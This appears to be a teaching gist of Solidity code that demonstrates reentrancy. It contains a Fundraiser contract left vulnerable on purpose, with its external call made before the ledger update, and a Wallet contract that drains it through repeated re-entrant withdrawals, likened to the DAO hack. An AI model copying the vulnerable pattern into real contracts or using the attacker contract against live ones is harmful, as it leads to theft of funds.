Created using remix-ide: Realtime Ethereum Contract Compiler and Runtime. Load this file by pasting this gists URL or ID at https://remix.ethereum.org/#version=soljson-v0.4.26+commit.4563c3fc.js&optimize=false&runs=200&gist=
pragma solidity ^0.4.24;
// Fundraiser: deliberately vulnerable demonstration contract.
// It keeps a per-address ledger of contributed ether and lets each address
// withdraw its recorded amount. withdrawCoins() performs its external call
// BEFORE clearing the ledger entry, which is the re-entrancy defect this
// example exists to show.
// None of the functions declare a visibility; under the 0.4.x compiler named
// by the pragma they default to public.
contract Fundraiser {
    // Ether credited to each contributor (in wei), keyed by contributor address.
    mapping(address=>uint) balances;

    // VULNERABLE: interaction happens before the state update.
    // The recorded balance is read, ether is sent to the caller through an
    // external call, and only afterwards is the ledger entry zeroed. While the
    // external call is running, the callee can call withdrawCoins() again and
    // will be paid from the same, still non-zero, ledger entry.
    // Mitigation: apply checks-effects-interactions, i.e. set
    // balances[msg.sender] = 0 before making the external call (optionally
    // combined with a re-entrancy lock).
    function withdrawCoins(){
        // Amount owed according to the ledger at the time of this call.
        uint withdrawAmount = balances[msg.sender];
        // Treats the caller as a contract exposing payout(); assumes msg.sender
        // is such a contract.
        Wallet wallet = Wallet(msg.sender);
        // External call that transfers withdrawAmount wei and hands control to
        // the caller's code while balances[msg.sender] is still unchanged.
        wallet.payout.value(withdrawAmount)();
        // The ledger is cleared only after the external call returns, so any
        // re-entrant withdrawCoins() made during that call ran against the
        // old balance.
        balances[msg.sender] = 0;
    }

    // Returns the total ether held by this contract (not the caller's ledger entry).
    function getBalance() constant returns (uint) {
        return address(this).balance;
    }

    // Accepts ether and credits it to the sender's ledger entry.
    function contribute() payable {
        balances[msg.sender] += msg.value;
    }

    // Fallback: accepts plain ether transfers without crediting any ledger entry.
    function() payable {
    }
}
// Wallet: counterparty contract used to demonstrate the re-entrancy defect in
// Fundraiser.withdrawCoins(). Its payout() function calls back into the
// Fundraiser while the Fundraiser's own withdrawCoins() call is still in
// progress. The demonstration depends on the Fundraiser zeroing its ledger
// only after the external call; with the ledger cleared first, the nested
// calls would find a zero balance.
// None of the functions declare a visibility or restrict who may call them.
contract Wallet {
    // The Fundraiser instance this contract interacts with; set once in the constructor.
    Fundraiser fundraiser;
    // Upper bound on the number of re-entrant withdrawCoins() calls made from payout().
    uint recursion=20;

    // Old-style constructor (function named after the contract): stores the
    // Fundraiser address to interact with.
    function Wallet(address fundraiserAddress) {
        fundraiser = Fundraiser(fundraiserAddress);
    }

    // Forwards `amount` wei to Fundraiser.contribute(), so the Fundraiser
    // credits this contract's address. The function is not payable, so the
    // ether has to be held by this contract already.
    function contribute(uint amount) {
        fundraiser.contribute.value(amount)();
    }

    // Starts a withdrawal; the Fundraiser sees this contract as msg.sender.
    function withdraw(){
        fundraiser.withdrawCoins();
    }

    // Returns the total ether held by this contract.
    function getBalance() constant returns (uint) {
        return address(this).balance;
    }

    // Invoked by Fundraiser.withdrawCoins() with the withdrawn ether attached.
    function payout() payable {
        // Re-entrant call: while the counter is positive, call withdrawCoins()
        // again before the outer withdrawCoins() has reached the line that
        // zeroes the ledger entry.
        if(recursion>0) {
            recursion--;
            fundraiser.withdrawCoins();
        }
    }

    // Fallback: accepts plain ether transfers.
    function() payable {
    }
}

shoupn commented Feb 21, 2022

Example of how the DAO contract was hacked through a re-entrant withdrawal, leading to the loss of ether.
